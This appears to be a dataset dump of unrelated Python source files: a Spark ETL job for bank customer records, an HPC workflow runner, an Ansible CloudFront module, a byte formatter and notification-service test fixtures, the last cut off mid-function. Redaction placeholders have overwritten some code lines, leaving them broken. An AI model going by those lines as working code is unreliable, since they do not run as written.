sqlContext.read.parquet(hdfs+\'/F_CI_XDXT_CUSTOMER_INFO/*\')\n#F_CI_XDXT_CUSTOMER_INFO.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO"")\nsql = """"""\n SELECT DST.CUSTOMERID --客户编号:src.CUSTOMERID\n ,DST.CUSTOMERNAME --客户名称:src.CUSTOMERNAME\n ,DST.CUSTOMERTYPE 
-- customer type:src.CUSTOMERTYPE\n ,DST.CERTTYPE -- ID document type:src.CERTTYPE\n ,DST.CERTID -- ID document number:src.CERTID\n ,DST.CUSTOMERPASSWORD -- customer password:src.CUSTOMERPASSWORD\n ,DST.INPUTORGID -- registering organization:src.INPUTORGID\n ,DST.INPUTUSERID -- registered by:src.INPUTUSERID\n ,DST.INPUTDATE -- registration date:src.INPUTDATE\n ,DST.REMARK -- remark:src.REMARK\n ,DST.MFCUSTOMERID -- core customer ID:src.MFCUSTOMERID\n ,DST.STATUS -- status:src.STATUS\n ,DST.BELONGGROUPID -- affiliated group code:src.BELONGGROUPID\n ,DST.CHANNEL -- channel:src.CHANNEL\n ,DST.LOANCARDNO -- loan card number:src.LOANCARDNO\n ,DST.CUSTOMERSCALE -- customer scale:src.CUSTOMERSCALE\n ,DST.CORPORATEORGID -- corporate organization ID:src.CORPORATEORGID\n ,DST.REMEDYFLAG -- supplementary-entry flag:src.REMEDYFLAG\n ,DST.DRAWFLAG -- draw flag:src.DRAWFLAG\n ,DST.MANAGERUSERID -- account manager:src.MANAGERUSERID\n ,DST.MANAGERORGID -- managing organization ID:src.MANAGERORGID\n ,DST.DRAWELIGIBILITY -- draw eligibility:src.DRAWELIGIBILITY\n ,DST.BLACKSHEETORNOT -- blacklisted customer or not:src.BLACKSHEETORNOT\n ,DST.CONFIRMORNOT -- effective or not:src.CONFIRMORNOT\n ,DST.CLIENTCLASSN -- current customer classification:src.CLIENTCLASSN\n ,DST.CLIENTCLASSM -- customer classification adjustment:src.CLIENTCLASSM\n ,DST.BUSINESSSTATE -- stock field flag:src.BUSINESSSTATE\n ,DST.MASTERBALANCE -- per-account balance:src.MASTERBALANCE\n ,DST.UPDATEDATE -- update date:src.UPDATEDATE\n ,DST.FR_ID -- corporate code:src.FR_ID\n ,DST.ODS_ST_DATE -- platform date:src.ODS_ST_DATE\n ,DST.ODS_SYS_ID -- source system code:src.ODS_SYS_ID\n FROM F_CI_XDXT_CUSTOMER_INFO DST \n LEFT JOIN F_CI_XDXT_CUSTOMER_INFO_INNTMP1 SRC \n ON SRC.CUSTOMERID = DST.CUSTOMERID \n AND SRC.FR_ID = DST.FR_ID \n WHERE SRC.CUSTOMERID IS NULL """"""\n\nsql = re.sub(r""\\bV_DT\\b"", ""\'""+V_DT10+""\'"", sql)\nF_CI_XDXT_CUSTOMER_INFO_INNTMP2 = sqlContext.sql(sql)\ndfn=""F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet""\nPI:KEY.unionAll(F_CI_XDXT_CUSTOMER_INFO_INNTMP1)\nF_CI_XDXT_CUSTOMER_INFO_INNTMP1.cache()\nF_CI_XDXT_CUSTOMER_INFO_INNTMP2.cache()\nnrowsi = F_CI_XDXT_CUSTOMER_INFO_INNTMP1.count()\nnrowsa = F_CI_XDXT_CUSTOMER_INFO_INNTMP2.count()\nF_CI_XDXT_CUSTOMER_INFO_INNTMP2.write.save(path = hdfs + \'/\' + dfn, mode=\'overwrite\')\nF_CI_XDXT_CUSTOMER_INFO_INNTMP1.unpersist()\nF_CI_XDXT_CUSTOMER_INFO_INNTMP2.unpersist()\net = datetime.now()\nprint(""Step %d start[%s] end[%s] use %d seconds, insert F_CI_XDXT_CUSTOMER_INFO lines %d, all lines %d"") % (V_STEP, st.strftime(""%H:%M:%S""), et.strftime(""%H:%M:%S""), (et-st).seconds, nrowsi, nrowsa)\nret = os.system(""hdfs dfs -mv /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT_LD+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/"")\n# first delete the current day\'s data from the backup table\nret = os.system(""hdfs dfs -rm -r /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT+"".parquet"")\n# copy the current day\'s full snapshot from the main table to the backup table\nret = os.system(""hdfs dfs -cp -f /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT+"".parquet"")\n', '#!/usr/bin/python\n""""""\nCopyright (c) 2014 High-Performance Computing and GIS (HPCGIS) Laboratory. All rights reserved.\nUse of this source code is governed by a BSD-style license that can be found in the LICENSE file.\nAuthors and contributors: Eric Shook (dummy@email.com)\n""""""\n\nimport os\nimport datetime\nimport time\nimport re\nimport subprocess\nfrom Queue import Queue\n#from threading import Thread\nimport threading\nimport sys,getopt\n\n\'\'\'\nThe workflow script accepts a tasklist file, which contains a list of taskfiles.\nA task may represent a simulation of an ABM or climate model. Tasks can be run \nsimultaneously if there are no dependencies or ordered in the case of \ndependencies. 
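Each taskfile uses a simple key: value layout (parsed in runtask() below), e.g.:\n\n program: /path/to/executable_with_a_name\n parameters: param1 -Optionalconfiguration param2 -AnotherParameter\n\n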
Tasks may also include pre-processing or post-processing tasks.\n\'\'\'\n\n# TODO: Logging may be useful if the workflow becomes long\n\n# TODO: Currently num_threads is user-defined, which controls the number of threads to launch tasks\n# However, it would be better to include in the taskfile the number of cores needed\n# and define the number of cores available, enabling the workflow system to manage core allocation\n\n# Global variables\n\n# The number of threads used to handle tasks is passed as a parameter\nnum_threads=0\n\n# Array of threads (so they can be killed if needed)\nthreads=[]\n\n# Array of task workflow numbers (one per thread/worker)\nthreadtasknums=[]\n\n# Task queue\ntaskqueue=Queue()\n\n# This function handles executing a task defined by a taskfile\ndef runtask(taskfile):\n\n # Read and parse the taskfile with the following format\n # Note additional parameters will likely be added based on need (e.g., CWD, data-dir)\n \'\'\'\n program: /path/to/executable_with_a_name \n parameters: param1 -Optionalconfiguration param2 -AnotherParameter\n \'\'\'\n with open(taskfile,\'r\') as f:\n # Set the required parameters as None for error checking at the end\n program=None\n parameters=None\n for line in f:\n if line.startswith(""program:""):\n # Extract the entire program location from after the colon split()[1]) with whitespace removed (strip())\n program=line.split("":"",1)[1].strip() \n #print ""Program=""+program\n \n if line.startswith(""parameters:""):\n # Extract the parameter string from after the colon split()[1]) with whitespace removed (strip())\n parameters=line.split("":"",1)[1].strip() \n #print ""Parameters=""+parameters\n\n # Error checking for required parameters\n if program==None:\n raise Exception(""program missing in taskfile"",taskfile) \n if parameters==None:\n raise Exception(""parameters missing in taskfile"",taskfile) \n\n print ""Calling program=""+program,parameters\n \'\'\'\n In future versions that have defined input,output,stdout,etc.\n there could be more logic here to:\n - run each model in a defined directory\n - output stdout,stderr in the directory\n - package up output files for easier transfer\n - ...\n \'\'\'\n returncode=subprocess.check_call(program+"" ""+parameters,shell=True)\n\n# A task worker loops while there are tasks left in the taskqueue\n# Input parameter is a thread id (tid)\ndef taskworker(tid):\n while not taskqueue.empty():\n taskfile=taskqueue.get()\n\n tasknum=taskfile.split(""/"",1)[1].split(""."",1)[0].strip() \n tasknum=re.sub(""\\D"", """", tasknum)\n #print ""tid="",tid\n threadtasknums[tid]=int(tasknum)\n\n # While there is a dependency problem (lower order task numbers are still being processed)\n # then spintwait\n mintasknum=min(threadtasknums)\n while threadtasknums[tid]>mintasknum:\n #print ""min="",minthreadtasknum,""min(array)="",min(*threadtasknums),""nums["",i,""]="",threadtasknums[i]\n #if(threadtasknums[tid]<=min(*threadtasknums)): # If this task number is less than or equal to the minimum \n # break # then there are no dependencies, so you can break out of this infinite loop\n time.sleep(1) # this is a spin-wait loop\n mintasknum=min(*threadtasknums)\n\n print ""Thread"",tid,""running"",taskfile,""at"",str(datetime.datetime.now())\n try:\n runtask(taskfile)\n except:\n exit(1)\n taskqueue.task_done()\n threadtasknums[tid]=999999 # Set the tasknum for tid to 9999 so it doesn\'t influence dependencies\n print ""Thread"",tid,""quitting, because taskqueue is empty""\n\n# Main program code\ndef main():\n print 
""Starting node workflow""\n\n try:\n opts,args=getopt.getopt(sys.argv[1:],""n:t:"",[""numthreads="",""tasklist=""])\n except getopt.GetoptError:\n print ""workflow.py -n -t ""\n sys.exit(1)\n\n # Set model filename and experiment name based on command-line parameter\n num_threads=0\n tasklistfile=""""\n for opt, arg in opts:\n if opt in (""-n"", ""--numthreads""):\n num_threads=int(arg)\n if opt in (""-t"", ""--tasklist""):\n tasklistfile=arg\n err=0\n if num_threads<=0:\n print "" [ ERROR ] Number of threads must be greater than 0""\n err=1\n if tasklistfile=="""":\n print "" [ ERROR ] Must provide tasklistfile""\n err=1\n if err==1:\n print ""workflow.py -n -t ""\n sys.exit(1)\n\n print ""Executing in current directory :"",os.getcwd()\n\n print ""Reading tasklist file""\n with open(tasklistfile,\'r\') as f:\n taskfiles = f.readlines()\n f.close()\n\n\n# tasksdir = \'tasks/\'\n# taskfiles = os.listdir(tasksdir) # Contains a list of task files to process \n taskfiles.sort()\n\n print ""Starting task queue""\n for taskfile in taskfiles:\n taskqueue.put(taskfile.strip())\n print ""Task queue contains "",taskqueue.qsize(),"" tasks""\n\n # Start the workflow engine\n # Currently the logic is simple -> one task==one thread==one core but that will need\n # to be modified to account for multithreaded models (agent-based and climate)\n # so eventually this will need to parse the task to determine the number of cores\n # needed by the task and dynamically manage the number of tasks running simultaneously\n print ""Starting "",num_threads,"" threads""\n for i in range(num_threads):\n threadtasknums.append(-1)\n t=threading.Thread(target=taskworker,args=(i,))\n t.daemon=True\n t.setDaemon(True)\n t.start()\n threads.append(t)\n\n # Now we wait until all of the tasks are finished.\n print ""Waiting for threads to finish""\n\n # Normally you can use a blocking .join, but then you cannot kill the process\n # So instead we spin-wait and catch ^C so a user can kill this process.\n# while threading.activeCount() > 0:\n# time.sleep(20)\n while taskqueue.qsize()>0:\n time.sleep(1)\n print ""taskqueue size"",taskqueue.qsize()\n \'\'\' # FIXME: Need to clean up this code, which was used for testing ^C \n try:\n time.sleep(5) # Wait 5 seconds before checking again\n # FIXME: In production this should be changed to 30\n # If Ctrl+C or other error, kill all of the threads\n except:\n while not taskqueue.empty(): # Empty the queue\n taskqueue.get()\n for i in threads:\n i.kill_received=True\n i.kill()\n exit(1)\n \'\'\'\n\n print ""Joining taskqueue""\n # At this point all of the tasks should be finished so we join them\n notfinished=1\n while notfinished==1:\n notfinished=0\n for i in range(num_threads):\n if threadtasknums[i]<999999:\n notfinished=1\n time.sleep(1)\n #while not taskqueue.join(1):\n # time.sleep(1)\n print ""Finished node workflow""\n\n# Run main\nif __name__==""__main__"":\n main()\n\n', '#!/usr/bin/python\n# Copyright (c) 2017 Ansible Project\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nANSIBLE_METADATA = {\'metadata_version\': \'1.1\',\n \'status\': [\'preview\'],\n \'supported_by\': \'community\'}\n\nDOCUMENTATION = \'\'\'\n---\n\nmodule: cloudfront_invalidation\n\nshort_description: create invalidations for AWS CloudFront distributions\ndescription:\n - Allows for invalidation of a batch of paths for a CloudFront distribution.\n\nrequirements:\n - 
boto3 >= 1.0.0\n - python >= 2.6\n\nversion_added: ""2.5""\n\nauthor: Willem van Ketwich (@wilvk)\n\nextends_documentation_fragment:\n - aws\n - ec2\n\noptions:\n distribution_id:\n description:\n - The ID of the CloudFront distribution to invalidate paths for. Can be specified instead of the alias.\n required: false\n type: str\n alias:\n description:\n - The alias of the CloudFront distribution to invalidate paths for. Can be specified instead of distribution_id.\n required: false\n type: str\n caller_reference:\n description:\n - A unique reference identifier for the invalidation paths.\n - Defaults to current datetime stamp.\n required: false\n default:\n type: str\n target_paths:\n description:\n - A list of paths on the distribution to invalidate. Each path should begin with \'/\'. Wildcards are allowed. eg. \'/foo/bar/*\'\n required: true\n type: list\n elements: str\n\nnotes:\n - does not support check mode\n\n\'\'\'\n\nEXAMPLES = \'\'\'\n\n- name: create a batch of invalidations using a distribution_id for a reference\n cloudfront_invalidation:\n distribution_id: E15BU8SDCGSG57\n caller_reference: testing 123\n target_paths:\n - /testpathone/test1.css\n - /testpathtwo/test2.js\n - /testpaththree/test3.ss\n\n- name: create a batch of invalidations using an alias as a reference and one path using a wildcard match\n cloudfront_invalidation:\n alias: alias.test.com\n caller_reference: testing 123\n target_paths:\n - /testpathone/test4.css\n - /testpathtwo/test5.js\n - /testpaththree/*\n\n\'\'\'\n\nRETURN = \'\'\'\ninvalidation:\n description: The invalidation\'s information.\n returned: always\n type: complex\n contains:\n create_time:\n description: The date and time the invalidation request was first made.\n returned: always\n type: str\n sample: \'2018-02-01T15:50:41.159000+00:00\'\n id:\n description: The identifier for the invalidation request.\n returned: always\n type: str\n sample: I2G9MOWJZFV612\n invalidation_batch:\n description: The current invalidation information for the batch request.\n returned: always\n type: complex\n contains:\n caller_reference:\n description: The value used to uniquely identify an invalidation request.\n returned: always\n type: str\n sample: testing 123\n paths:\n description: A dict that contains information about the objects that you want to invalidate.\n returned: always\n type: complex\n contains:\n items:\n description: A list of the paths that you want to invalidate.\n returned: always\n type: list\n sample:\n - /testpathtwo/test2.js\n - /testpathone/test1.css\n - /testpaththree/test3.ss\n quantity:\n description: The number of objects that you want to invalidate.\n returned: always\n type: int\n sample: 3\n status:\n description: The status of the invalidation request.\n returned: always\n type: str\n sample: Completed\nlocation:\n description: The fully qualified URI of the distribution and invalidation batch request.\n returned: always\n type: str\n sample: https://cloudfront.amazonaws.PI:KEY\n\'\'\'\n\nfrom ansible.module_utils.ec2 import get_aws_connection_info\nfrom ansible.module_utils.ec2 import ec2_argument_spec, boto3_conn\nfrom ansible.module_utils.ec2 import snake_dict_to_camel_dict\nfrom ansible.module_utils.ec2 import camel_dict_to_snake_dict\nfrom ansible.module_utils.aws.core import AnsibleAWSModule\nfrom ansible.module_utils.aws.cloudfront_facts import CloudFrontFactsServiceManager\nimport datetime\n\ntry:\n from botocore.exceptions import ClientError, BotoCoreError\nexcept ImportError:\n pass # caught by imported 
AnsibleAWSModule\n\n\nclass CloudFrontInvalidationServiceManager(object):\n """"""\n Handles CloudFront service calls to AWS for invalidations\n """"""\n\n def __init__(self, module):\n self.module = module\n self.create_client(\'cloudfront\')\n\n def create_client(self, resource):\n region, ec2_url, aws_connect_kwargs = get_aws_connection_info(self.module, boto3=True)\n self.client = boto3_conn(self.module, conn_type=\'client\', resource=resource, region=region, endpoint=ec2_url, **aws_connect_kwargs)\n\n def create_invalidation(self, distribution_id, invalidation_batch):\n current_invalidation_response = self.get_invalidation(distribution_id, invalidation_batch[\'CallerReference\'])\n try:\n response = self.client.create_invalidation(DistributionId=distribution_id, InvalidationBatch=invalidation_batch)\n response.pop(\'ResponseMetadata\', None)\n if current_invalidation_response:\n return response, False\n else:\n return response, True\n except BotoCoreError as e:\n self.module.fail_json_aws(e, msg=""Error creating CloudFront invalidations."")\n except ClientError as e:\n if (\'Your request contains a caller reference that was used for a previous invalidation batch \'\n \'for the same distribution.\' in e.response[\'Error\'][\'Message\']):\n self.module.warn(""InvalidationBatch target paths are not modifiable. ""\n ""To make a new invalidation please update caller_reference."")\n return current_invalidation_response, False\n else:\n self.module.fail_json_aws(e, msg=""Error creating CloudFront invalidations."")\n\n def get_invalidation(self, distribution_id, caller_reference):\n current_invalidation = {}\n # find all invalidations for the distribution\n try:\n paginator = self.client.get_paginator(\'list_invalidations\')\n invalidations = paginator.paginate(DistributionId=distribution_id).build_full_result().get(\'InvalidationList\', {}).get(\'Items\', [])\n invalidation_ids = [inv[\'Id\'] for inv in invalidations]\n except (BotoCoreError, ClientError) as e:\n self.module.fail_json_aws(e, msg=""Error listing CloudFront invalidations."")\n\n # check if there is an invalidation with the same caller reference\n for inv_id in invalidation_ids:\n try:\n invalidation = self.client.get_invalidation(DistributionId=distribution_id, Id=inv_id)[\'Invalidation\']\n caller_ref = invalidation.get(\'InvalidationBatch\', {}).get(\'CallerReference\')\n except (BotoCoreError, ClientError) as e:\n self.module.fail_json_aws(e, msg=""Error getting CloudFront invalidation {0}"".format(inv_id))\n if caller_ref == caller_reference:\n current_invalidation = invalidation\n break\n\n current_invalidation.pop(\'ResponseMetadata\', None)\n return current_invalidation\n\n\nclass CloudFrontInvalidationValidationManager(object):\n """"""\n Manages CloudFront validations for invalidation batches\n """"""\n\n def __init__(self, module):\n self.module = module\n self.__cloudfront_facts_mgr = CloudFrontFactsServiceManager(module)\n\n def validate_distribution_id(self, distribution_id, alias):\n try:\n if distribution_id is None and alias is None:\n self.module.fail_json(msg=""distribution_id or alias must be specified"")\n if distribution_id is None:\n distribution_id = self.__cloudfront_facts_mgr.get_distribution_id_from_domain_name(alias)\n return distribution_id\n except (ClientError, BotoCoreError) as e:\n self.module.fail_json_aws(e, msg=""Error validating parameters."")\n\n def create_aws_list(self, invalidation_batch):\n aws_list = {}\n aws_list[""Quantity""] = len(invalidation_batch)\n aws_list[""Items""] = 
invalidation_batch\n return aws_list\n\n def validate_invalidation_batch(self, invalidation_batch, caller_reference):\n try:\n if caller_reference is not None:\n valid_caller_reference = caller_reference\n else:\n valid_caller_reference = datetime.datetime.now().isoformat()\n valid_invalidation_batch = {\n \'paths\': self.create_aws_list(invalidation_batch),\n \'caller_reference\': valid_caller_reference\n }\n return valid_invalidation_batch\n except (ClientError, BotoCoreError) as e:\n self.module.fail_json_aws(e, msg=""Error validating invalidation batch."")\n\n\ndef main():\n argument_spec = ec2_argument_spec()\n\n argument_spec.update(dict(\n caller_reference=dict(),\n distribution_id=dict(),\n alias=dict(),\n target_paths=dict(required=True, type=\'list\')\n ))\n\n module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=False, mutually_exclusive=[[\'distribution_id\', \'alias\']])\n\n validation_mgr = CloudFrontInvalidationValidationManager(module)\n service_mgr = CloudFrontInvalidationServiceManager(module)\n\n caller_reference = module.params.get(\'caller_reference\')\n distribution_id = module.params.get(\'distribution_id\')\n alias = module.params.get(\'alias\')\n target_paths = module.params.get(\'target_paths\')\n\n result = {}\n\n distribution_id = validation_mgr.validate_distribution_id(distribution_id, alias)\n valid_target_paths = validation_mgr.validate_invalidation_batch(target_paths, caller_reference)\n valid_pascal_target_paths = snake_dict_to_camel_dict(valid_target_paths, True)\n result, changed = service_mgr.create_invalidation(distribution_id, valid_pascal_target_paths)\n\n module.exit_json(changed=changed, **camel_dict_to_snake_dict(result))\n\n\nif __name__ == \'__main__\':\n main()\n', '#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (C) 2006 José de Paula Eufrásio Junior (dummy@email.com) AND\n# Yves Junqueira (dummy@email.com)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n# from http://www.voidspace.org.uk/python/pathutils.html (BSD License)\n\ndef formatbytes(sizeint, configdict=None, **configs):\n """"""\n Given a file size as an integer, return a nicely formatted string that\n represents the size. Has various options to control it\'s output.\n \n You can pass in a dictionary of arguments or keyword arguments. Keyword\n arguments override the dictionary and there are sensible defaults for options\n you don\'t set.\n \n Options and defaults are as follows :\n \n * ``forcekb = False`` - If set this forces the output to be in terms\n of kilobytes and bytes only.\n \n * ``largestonly = True`` - If set, instead of outputting \n ``1 Mbytes, 307 Kbytes, 478 bytes`` it outputs using only the largest \n denominator - e.g. 
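Under the hood, the module's create_invalidation() call maps (after the snake-to-camel conversion in main()) onto the plain boto3 CloudFront API. A hedged sketch of the equivalent direct call, reusing the example distribution id and paths from the documentation block above; reusing a CallerReference with different paths is exactly what triggers the module's "not modifiable" warning branch:

import boto3

client = boto3.client("cloudfront")
response = client.create_invalidation(
    DistributionId="E15BU8SDCGSG57",  # example id from the docs above
    InvalidationBatch={
        "Paths": {"Quantity": 2,
                  "Items": ["/testpathone/test1.css", "/testpaththree/*"]},
        # CloudFront rejects a reused CallerReference with different paths;
        # the module catches that ClientError and warns instead of failing.
        "CallerReference": "testing 123",
    },
)
print(response["Invalidation"]["Status"])  # e.g. 'InProgress'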
``1.3 Mbytes`` or ``17.2 Kbytes``\n \n * ``kiloname = \'Kbytes\'`` - The string to use for kilobytes\n \n * ``meganame = \'Mbytes\'`` - The string to use for Megabytes\n \n * ``bytename = \'bytes\'`` - The string to use for bytes\n \n * ``nospace = True`` - If set it outputs ``1Mbytes, 307Kbytes``, \n notice there is no space.\n \n Example outputs : ::\n \n 19Mbytes, 75Kbytes, 255bytes\n 2Kbytes, 0bytes\n 23.8Mbytes\n \n .. note::\n \n It currently uses the plural form even for singular.\n """"""\n defaultconfigs = { \'forcekb\' : False,\n \'largestonly\' : True,\n \'kiloname\' : \'Kbytes\',\n \'meganame\' : \'Mbytes\',\n \'bytename\' : \'bytes\',\n \'nospace\' : True}\n if configdict is None:\n configdict = {}\n for entry in configs:\n # keyword parameters override the dictionary passed in\n configdict[entry] = configs[entry]\n #\n for keyword in defaultconfigs:\n if not configdict.has_key(keyword):\n configdict[keyword] = defaultconfigs[keyword]\n #\n if configdict[\'nospace\']:\n space = \'\'\n else:\n space = \' \'\n #\n mb, kb, rb = bytedivider(sizeint)\n if configdict[\'largestonly\']:\n if mb and not configdict[\'forcekb\']:\n return stringround(mb, kb)+ space + configdict[\'meganame\']\n elif kb or configdict[\'forcekb\']:\n if mb and configdict[\'forcekb\']:\n kb += 1024*mb\n return stringround(kb, rb) + space+ configdict[\'kiloname\']\n else:\n return str(rb) + space + configdict[\'bytename\']\n else:\n outstr = \'\'\n if mb and not configdict[\'forcekb\']:\n outstr = str(mb) + space + configdict[\'meganame\'] +\', \'\n if kb or configdict[\'forcekb\'] or mb:\n if configdict[\'forcekb\']:\n kb += 1024*mb\n outstr += str(kb) + space + configdict[\'kiloname\'] +\', \'\n return outstr + str(rb) + space + configdict[\'bytename\']\n\n\n', 'import random\nimport uuid\nfrom datetime import date, datetime, timedelta\n\nimport pytest\n\nfrom app import db\nfrom app.dao import fact_processing_time_dao\nfrom app.dao.email_branding_dao import dao_create_email_branding\nfrom app.dao.inbound_sms_dao import dao_create_inbound_sms\nfrom app.dao.invited_org_user_dao import save_invited_org_user\nfrom app.dao.invited_user_dao import save_invited_user\nfrom app.dao.jobs_dao import dao_create_job\nfrom app.dao.notifications_dao import dao_create_notification\nfrom app.dao.organisation_dao import (\n dao_add_service_to_organisation,\n dao_create_organisation,\n)\nfrom app.dao.permissions_dao import permission_dao\nfrom app.dao.service_callback_api_dao import save_service_callback_api\nfrom app.dao.service_data_retention_dao import insert_service_data_retention\nfrom app.dao.service_inbound_api_dao import save_service_inbound_api\nfrom app.dao.service_permissions_dao import dao_add_service_permission\nfrom app.dao.service_sms_sender_dao import (\n dao_update_service_sms_sender,\n update_existing_sms_sender_with_inbound_number,\n)\nfrom app.dao.services_dao import dao_add_user_to_service, dao_create_service\nfrom app.dao.templates_dao import dao_create_template, dao_update_template\nfrom app.dao.users_dao import save_model_user\nfrom app.models import (\n EMAIL_TYPE,\n KEY_TYPE_NORMAL,\n LETTER_TYPE,\n MOBILE_TYPE,\n SMS_TYPE,\n AnnualBilling,\n ApiKey,\n BroadcastEvent,\n BroadcastMessage,\n BroadcastProvider,\n BroadcastProviderMessage,\n BroadcastProviderMessageNumber,\n BroadcastStatusType,\n Complaint,\n DailySortedLetter,\n Domain,\n EmailBranding,\n FactBilling,\n FactNotificationStatus,\n FactProcessingTime,\n InboundNumber,\n InboundSms,\n InvitedOrganisationUser,\n InvitedUser,\n Job,\n 
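formatbytes() above is Python 2 (dict.has_key) and leans on bytedivider() and stringround() helpers defined elsewhere in pathutils. A self-contained Python 3 sketch of the same idea, matching the nospace default and assuming binary (1024-based) units:

def format_bytes(size, largest_only=True, force_kb=False):
    mb, rem = divmod(size, 1024 * 1024)
    kb, b = divmod(rem, 1024)
    if largest_only:
        if mb and not force_kb:
            return "%.1fMbytes" % (size / (1024 * 1024))
        if kb or force_kb:
            return "%.1fKbytes" % (size / 1024)   # folds any Mbytes into Kbytes
        return "%dbytes" % b
    return "%dMbytes, %dKbytes, %dbytes" % (mb, kb, b)

print(format_bytes(25000000))                   # 23.8Mbytes
print(format_bytes(2300))                       # 2.2Kbytes
print(format_bytes(2300, largest_only=False))   # 0Mbytes, 2Kbytes, 252bytes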
LetterBranding,\n LetterRate,\n Notification,\n NotificationHistory,\n Organisation,\n Permission,\n Rate,\n ReturnedLetter,\n Service,\n ServiceCallbackApi,\n ServiceContactList,\n ServiceEmailReplyTo,\n ServiceGuestList,\n ServiceInboundApi,\n ServiceLetterContact,\n ServicePermission,\n ServiceSmsSender,\n Template,\n TemplateFolder,\n User,\n WebauthnCredential,\n)\n\n\ndef create_user(\n *,\n mobile_number=""+447700900986"",\n dummy@email.com"",\n state=\'active\',\n id_=None,\n name=""Test User""\n):\n data = {\n \'id\': id_ or uuid.uuid4(),\n \'name\': name,\n \'email_address\': email,\n \'password\': \'password\',\n \'mobile_number\': mobile_number,\n \'state\': state\n }\n user = User.query.filter_by(email_address=email).first()\n if not user:\n user = User(**data)\n save_model_user(user, validated_email_access=True)\n return user\n\n\ndef create_permissions(user, service, *permissions):\n permissions = [\n Permission(service_id=service.id, user_id=user.id, permission=p)\n for p in permissions\n ]\n\n permission_dao.set_user_service_permission(user, service, permissions, _commit=True)\n\n\ndef create_service(\n user=None,\n service_name=""Sample service"",\n service_id=None,\n restricted=False,\n count_as_live=True,\n service_permissions=None,\n research_mode=False,\n active=True,\n email_from=None,\n prefix_sms=True,\n message_limit=1000,\n organisation_type=\'central\',\n check_if_service_exists=False,\n go_live_user=None,\n go_live_at=None,\n crown=True,\n organisation=None,\n purchase_order_number=None,\n billing_contact_names=None,\n billing_contact_email_addresses=None,\n billing_reference=None,\n):\n if check_if_service_exists:\n service = Service.query.filter_by(name=service_name).first()\n if (not check_if_service_exists) or (check_if_service_exists and not service):\n service = Service(\n name=service_name,\n message_limit=message_limit,\n restricted=restricted,\n email_from=email_from if email_from else service_name.lower().replace(\' \', \'.\'),\n created_by=user if user else create_user(dummy@email.com())),\n prefix_sms=prefix_sms,\n organisation_type=organisation_type,\n organisation=organisation,\n go_live_user=go_live_user,\n go_live_at=go_live_at,\n crown=crown,\n purchase_order_number=purchase_order_number,\n billing_contact_names=billing_contact_names,\n billing_contact_email_addresses=billing_contact_email_addresses,\n billing_reference=billing_reference,\n )\n dao_create_service(\n service,\n service.created_by,\n service_id,\n service_permissions=service_permissions,\n )\n\n service.active = active\n service.research_mode = research_mode\n service.count_as_live = count_as_live\n else:\n if user and user not in service.users:\n dao_add_user_to_service(service, user)\n\n return service\n\n\ndef create_service_with_inbound_number(\n inbound_number=\'1234567\',\n *args, **kwargs\n):\n service = create_service(*args, **kwargs)\n\n sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first()\n inbound = create_inbound_number(number=inbound_number, service_id=service.id)\n update_existing_sms_sender_with_inbound_number(service_sms_sender=sms_sender,\n sms_sender=inbound_number,\n inbound_number_id=inbound.id)\n\n return service\n\n\ndef create_service_with_defined_sms_sender(\n sms_sender_value=\'1234567\',\n *args, **kwargs\n):\n service = create_service(*args, **kwargs)\n\n sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first()\n dao_update_service_sms_sender(service_id=service.id,\n service_sms_sender_id=sms_sender.id,\n 
is_default=True,\n sms_sender=sms_sender_value)\n\n return service\n\n\ndef create_template(\n service,\n template_type=SMS_TYPE,\n template_name=None,\n subject=\'Template subject\',\n content=\'Dear Sir/Madam, Hello. Yours Truly, The Government.\',\n reply_to=None,\n hidden=False,\n archived=False,\n folder=None,\n postage=None,\n process_type=\'normal\',\n contact_block_id=None\n):\n data = {\n \'name\': template_name or \'{} Template Name\'.format(template_type),\n \'template_type\': template_type,\n \'content\': content,\n \'service\': service,\n \'created_by\': service.created_by,\n \'reply_to\': reply_to,\n \'hidden\': hidden,\n \'folder\': folder,\n \'process_type\': process_type,\n }\n if template_type == LETTER_TYPE:\n data[""postage""] = postage or ""second""\n if contact_block_id:\n data[\'service_letter_contact_id\'] = contact_block_id\n if template_type != SMS_TYPE:\n data[\'subject\'] = subject\n template = Template(**data)\n dao_create_template(template)\n\n if archived:\n template.archived = archived\n dao_update_template(template)\n\n return template\n\n\ndef create_notification(\n template=None,\n job=None,\n job_row_number=None,\n to_field=None,\n status=\'created\',\n reference=None,\n created_at=None,\n sent_at=None,\n updated_at=None,\n billable_units=1,\n personalisation=None,\n api_key=None,\n key_type=KEY_TYPE_NORMAL,\n sent_by=None,\n client_reference=None,\n rate_multiplier=None,\n international=False,\n phone_prefix=None,\n scheduled_for=None,\n normalised_to=None,\n one_off=False,\n reply_to_text=None,\n created_by_id=None,\n postage=None,\n document_download_count=None,\n):\n assert job or template\n if job:\n template = job.template\n\n if created_at is None:\n created_at = datetime.utcnow()\n\n if to_field is None:\n to_field = \'+447700900855\' if template.template_type == SMS_TYPE else dummy@email.com\'\n\n if status not in (\'created\', \'validation-failed\', \'virus-scan-failed\', \'pending-virus-check\'):\n sent_at = sent_at or datetime.utcnow()\n updated_at = updated_at or datetime.utcnow()\n\n if not one_off and (job is None and api_key is None):\n # we did not specify in test - lets create it\n api_key = ApiKey.query.filter(ApiKey.service == template.service, ApiKey.key_type == key_type).first()\n if not api_key:\n api_key = 